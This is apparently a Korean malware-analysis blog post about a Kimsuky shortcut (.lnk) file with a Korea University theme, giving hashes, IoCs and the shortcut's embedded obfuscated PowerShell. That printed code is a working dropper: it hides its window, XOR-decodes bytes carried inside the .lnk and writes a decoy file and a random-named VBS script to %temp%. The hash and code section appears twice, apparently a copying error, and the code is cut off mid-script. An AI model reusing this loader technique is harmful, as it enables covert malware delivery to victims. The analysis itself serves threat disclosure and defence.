고려 대학교 하고 관련이 있을것 같은 김수키(Kimsuky) 만든 악성코드(2024.9.1)
Contents
오늘은 고려 대학교하고 관련이 있을 것 같은 김수키(Kimsuky) 만든 악성코드에 대해 글을 적어 보겠습니다. 제목을 이렇게 붙였지만 일단 私見이 들어가져 있습니다.
왜 그런 것인지는 글을 잘 읽어 주시면 됩니다.
악성코드 해쉬값
파일명:1.lnk
사이즈:5.92 KB
MD5:9110aeca8e78ede7b913ac54b4332b00
SHA-1:50f580199250c5b9ca7e9a3b4ccea5d8603eab28
SHA-256:bd017c642fcd0b46fb1201f22d395edbf16221ebbcb660f7329fb76067164d07
일단 실행을 하기 전에 악성코드에 포함된 파워셀 코드는 다음과 같습니다.
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 02/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
/C f(H)jk4fTLlkc5DZfyorHstui(9)FxCd6(x)w3Jkdddddddddddddddfklsjjjjdjjjjjjj
jjsdfjjjjjjjjjjjsdfjj(j)jjsdfjjjjjjjjjjjsssssss(d)jdddddddddikkkkdddddd(d)dd
dddddddddddddddddddddddd(d)dddddddddddddddddddddddddddddddddddddd(d)kdddddddd
ddddddddd(d)dddddddddddddddddddddddddddd(d)ddddddddddddddddddddddddddddddddddd
ddd(d)dddddddddddddddd(d)ddddddddddddddddddddddddddddddddddddddddddddkkkkkkkkk
kkffffffffffffff(f)ffffffffffffffffffffffffffkkkdkkkkkkkkkkkkkk(k)kkkkkkkkdddd
ddddddddddd(d)(d)ddddddddddddddd(d)dllllllllllllllleZWhdwrpiX+F4gEcRJCp5kddddd
ddddddddlkjsldkfjlkjlkjl(k)jlkjjjjjjj(j)jjjjjjjsdfffffff(f)ffffffslkjlkksdflkj
lknnlksn(l)dkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^(h)^e^L^L -windo(w)style
hidden -c function getShapePath(){$lnkpath = G^e^t-C^hi^ld^Item *.lnk;$lnkpath
= $lnkpath^| w^he^re-o(b)^ject {$_.length -eq 0x000017B1} ;$lnkpath = $lnk(p)a
th^| S^el^ect-O^bject -Expand(P)roperty Name;return $lnkpath;} function getImg
Content(){$lnk(p)ath = getSha(p)ePath;$file = ^g^c $lnk(p)ath -E^nco^din^g Byt
e;r(e)turn $file};funct(i)on makepath(){$lnkpath = getShapePath;$lnkpath = '%t
emp%\'+$lnkpath.substring(0,$l(n)kpath.length-4);return $lnkpath};func(t)ion m
akepath1(){$path1 = '%temp%\tmp' (+) (Get(-)Random) + '(.)vbs';return $path1;}
;function ch(a)ngecontent(){$file = getImg(C)ontent; for($i=0; $i -lt $file(.)
count; $i++) { $file[$i] = $file[$i] -b(x)or 5 };return $file;};function su(b)
save{$path = makepath;$bytes = chan(g)econtent;$temp = $bytes ^| select -Skip
005602 ;$temp = ($temp ^|select -Ski(p)Last 000453);sc $path ([by(t)e[]]$temp)
-Encoding Byte(;)return @($path,$bytes);};function sa(v)econtent(){$_a_res = s
ubsave;$path1 = makepath1; ^s^c $path1 ([byte[]]($_a_(r)es[1] ^| select -Skip
005612)) -Encoding Byte;return @($_a_res[0],$path1);};$_a_path = savecontent;$
path1 = $_a_path[0];$path = …
왜 그런 것인지는 글을 잘 읽어 주시면 됩니다.
악성코드 해쉬값
파일명:1.lnk
사이즈:5.92 KB
MD5:9110aeca8e78ede7b913ac54b4332b00
SHA-1:50f580199250c5b9ca7e9a3b4ccea5d8603eab28
SHA-256:bd017c642fcd0b46fb1201f22d395edbf16221ebbcb660f7329fb76067164d07
일단 실행을 하기 전에 악성코드에 포함된 파워셀 코드는 다음과 같습니다.
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 02/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
/C f(H)jk4fTLlkc5DZfyorHstui(9)FxCd6(x)w3Jkdddddddddddddddfklsjjjjdjjjjjjj
jjsdfjjjjjjjjjjjsdfjj(j)jjsdfjjjjjjjjjjjsssssss(d)jdddddddddikkkkdddddd(d)dd
dddddddddddddddddddddddd(d)dddddddddddddddddddddddddddddddddddddd(d)kdddddddd
ddddddddd(d)dddddddddddddddddddddddddddd(d)ddddddddddddddddddddddddddddddddddd
ddd(d)dddddddddddddddd(d)ddddddddddddddddddddddddddddddddddddddddddddkkkkkkkkk
kkffffffffffffff(f)ffffffffffffffffffffffffffkkkdkkkkkkkkkkkkkk(k)kkkkkkkkdddd
ddddddddddd(d)(d)ddddddddddddddd(d)dllllllllllllllleZWhdwrpiX+F4gEcRJCp5kddddd
ddddddddlkjsldkfjlkjlkjl(k)jlkjjjjjjj(j)jjjjjjjsdfffffff(f)ffffffslkjlkksdflkj
lknnlksn(l)dkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^(h)^e^L^L -windo(w)style
hidden -c function getShapePath(){$lnkpath = G^e^t-C^hi^ld^Item *.lnk;$lnkpath
= $lnkpath^| w^he^re-o(b)^ject {$_.length -eq 0x000017B1} ;$lnkpath = $lnk(p)a
th^| S^el^ect-O^bject -Expand(P)roperty Name;return $lnkpath;} function getImg
Content(){$lnk(p)ath = getSha(p)ePath;$file = ^g^c $lnk(p)ath -E^nco^din^g Byt
e;r(e)turn $file};funct(i)on makepath(){$lnkpath = getShapePath;$lnkpath = '%t
emp%\'+$lnkpath.substring(0,$l(n)kpath.length-4);return $lnkpath};func(t)ion m
akepath1(){$path1 = '%temp%\tmp' (+) (Get(-)Random) + '(.)vbs';return $path1;}
;function ch(a)ngecontent(){$file = getImg(C)ontent; for($i=0; $i -lt $file(.)
count; $i++) { $file[$i] = $file[$i] -b(x)or 5 };return $file;};function su(b)
save{$path = makepath;$bytes = chan(g)econtent;$temp = $bytes ^| select -Skip
005602 ;$temp = ($temp ^|select -Ski(p)Last 000453);sc $path ([by(t)e[]]$temp)
-Encoding Byte(;)return @($path,$bytes);};function sa(v)econtent(){$_a_res = s
ubsave;$path1 = makepath1; ^s^c $path1 ([byte[]]($_a_(r)es[1] ^| select -Skip
005612)) -Encoding Byte;return @($_a_res[0],$path1);};$_a_path = savecontent;$
path1 = $_a_path[0];$path = …
IoC
50f580199250c5b9ca7e9a3b4ccea5d8603eab28
9110aeca8e78ede7b913ac54b4332b00
bd017c642fcd0b46fb1201f22d395edbf16221ebbcb660f7329fb76067164d07
9110aeca8e78ede7b913ac54b4332b00
bd017c642fcd0b46fb1201f22d395edbf16221ebbcb660f7329fb76067164d07